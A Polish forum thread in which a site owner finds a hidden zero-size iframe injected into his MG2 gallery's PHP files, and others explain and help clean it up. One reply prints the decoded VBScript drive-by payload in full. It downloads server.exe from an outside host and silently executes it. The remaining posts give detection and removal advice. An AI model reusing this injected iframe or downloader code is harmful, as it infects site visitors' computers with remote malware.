hack galerii

Zwiń
X

• Czas
  • Pokaż
Wyczyść wszystko
new posts
  • Oakhallow
    Początki nałogu
    • 2005
    • 258

hack galerii

Dzisiaj zauważyłem, że w mojej galerii, MG2, coś się zaczęło krzaczyć. Szybkie śledztwo wykazało, że w plikach głównych php pojawił się na samym początku dziwny wpis:
    iframe src='http://thevip.oicp.net/info.html' width=0 height=0></iframe

Po usunięciu wszystko wróciło do normy. Czy ktoś się może orientuje co to za ustrojstwo??

Oakhallow
  • muflon
    Pełne uzależnienie
    • 2004
    • 6763

Na oko jakiś exploit do IE (VBscript, bytecode). No, coś co zamienia komputer odwiedzającego w wysyłające spam zombie... albo inne takie :-D
    zdjęcia lotnicze - zdjęcia ogólnie - airshow-reviews.com

Komentarz

• ags
      Bywalec
      • 2005
      • 185

Jakby komuś była treść potrzebna:
      on error resume next dl = "http://thevip.oicp.net/server.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") str5="Adodb.Stream" set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="521.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0
      puszka, szkieko i błyskotka

Komentarz

• Oakhallow
        Początki nałogu
        • 2005
        • 258

ags a możesz jakoś ludzkim językiem

Czy można było to zrobić beż fizycznego wejścia na ftp?? Czy ktoś po prostu buszował po moim serwerze??

Oakhallow

Komentarz

• muflon
          Pełne uzależnienie
          • 2004
          • 6763

"Po ludzku" oznacza to, ze przeglądającemu stronę zainstaluje się w systemie programik http://thevip.oicp.net/server.exe i będzie się uruchamiał przy każdym starcie systemu. Co może robić taki soft, już napisałem wyżej.

Jeśli pytasz jak ktoś tam wrzucił to świństwo... no hmm, google na hasło "mg2 security" wyrzucają całkiem sporo ciekawych informacji Wystarczy jakiś drobny błąd w skrypcie.

Komentarz

• Oakhallow
            Początki nałogu
            • 2005
            • 258

Dzięki Muflon.
            Wniosek chyba jest taki, że należałoby zrezygnować z tego skryptu.

A mam jeszcze takie pytanko.
            Otwierałem swoją galerię FF, ale kiedy pojawił się błąd otworzyłem też IE żeby sprawdzić czy nie rozjechało się coś tylko pod FF. Mam xp ze pełnym kompletem aktualizacji, NOD32 i Outposta. Czy mam problem??

Oakhallow
            Ostatnio edytowany przez Oakhallow; 3539.

Komentarz

• muflon
              Pełne uzależnienie
              • 2004
              • 6763

Zamieszczone przez Oakhallow
              Czy mam problem??
              To już pytanie nie do mnie... nie jestem na bieżąco jeśli chodzi o aktualności w temacie spyware, botnetów itp. Ja bym do tego podszedł z grubej rury, uruchamiając obok jakiś monitor sieci i patrząc co robi. Jeśli "coś jest" to na >50% działa to jako zombie wysyłające spam, teraz to najmodniejszy trend. Myślę że na pewno są jakieś programy, które to wykrywają, jacyś spece od Windows na pewno Ci coś doradzą.

Komentarz

• ags
                Bywalec
                • 2005
                • 185

Przepraszam za taką treść, ale nie miałem czasu tego nawet połamać, tylko wydrukowałem literki z kodów ascii z tego skryptu. Zobacz, czy nie masz w ctrl-alt-del 521.com albo server.exe. Ew chwilę po starcie systemu nic nie rób, tylko włącz sobie start -> uruchom -> cmd [enter] i netstat. Jeżeli będą jakieś połączenia, to już jest podejrzane. Proponuję przeskanować Spybot S&D i AdAwarem (bo oba darmowe).

Komentarz

• muflon
                  Pełne uzależnienie
                  • 2004
                  • 6763

Ewentualnie można jeszcze zobaczyć czy nic podejrzanego nie uruchamia się przy starcie, z rejestru, to są klucze /HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run, RunOnce, Runservices, RunServicesOnce i podobne w pozostałych HKEY_* najwyższego poziomu. Ale dobry exploit będzie potrafił się schować zarówno przed netstatem jak i przed regeditem

(te klucze rejestru pisane z pamięci, mogłem się gdzieś machnąć ;-))

Komentarz

• Oakhallow
                    Początki nałogu
                    • 2005
                    • 258

Tam gdzie otwierałem strone na IE zrobiłem na wszelki wypadek format c:, a na drugim otwierałem tylko pod FF, co mam nadzieję wyklucza infekcję.

Swoją drogą jest nauczka, że nie wolno do stref zaufanych wrzucać własnych stron i należy je traktować jak każdą inną w necie, czyli z dużą dozą ostrożności.

Oakhallow

Komentarz

• muflon
                      Pełne uzależnienie
                      • 2004
                      • 6763

Swoją drogą jest nauczka, że nie wolno do stref zaufanych wrzucać własnych stron i należy je traktować jak każdą inną w necie, czyli z dużą dozą ostrożności.
                      Nauczka jest... ale IMHO zupełnie inna

Komentarz

• Oakhallow
                        Początki nałogu
                        • 2005
                        • 258

Nawet domyślam się jaka.
                        Ale potem Płatnik sam się obsłuży a np Oblivion sam sie wygra

Oakhallow

Komentarz

• marnow
                          Coś już napisał
                          • 2005
                          • 91

Nawet domyślam się jaka.
                          Ale potem Płatnik sam się obsłuży a np Oblivion sam sie wygra

Oakhallow
                          wpisz w uruchom "msconfig" zobacz co ci sie laduje prz starcie systemu, mozna znalesc interesujacy stuff prosty i wygodny sposob bez przegladania rejestrow

--
                          marnow

Komentarz

• ags
                            Bywalec
                            • 2005
                            • 185

Tam wszystkiego nie ma.

Komentarz

• Vitez
                              zło konieczne
                              • 2004
                              • 19804

Code Stuff Starter i/ub Secure Task Manager.
                              Rowniez platna wersja Ad-aware ma calkiem ladny czysciciel startupu.

Komentarz

Pracuję...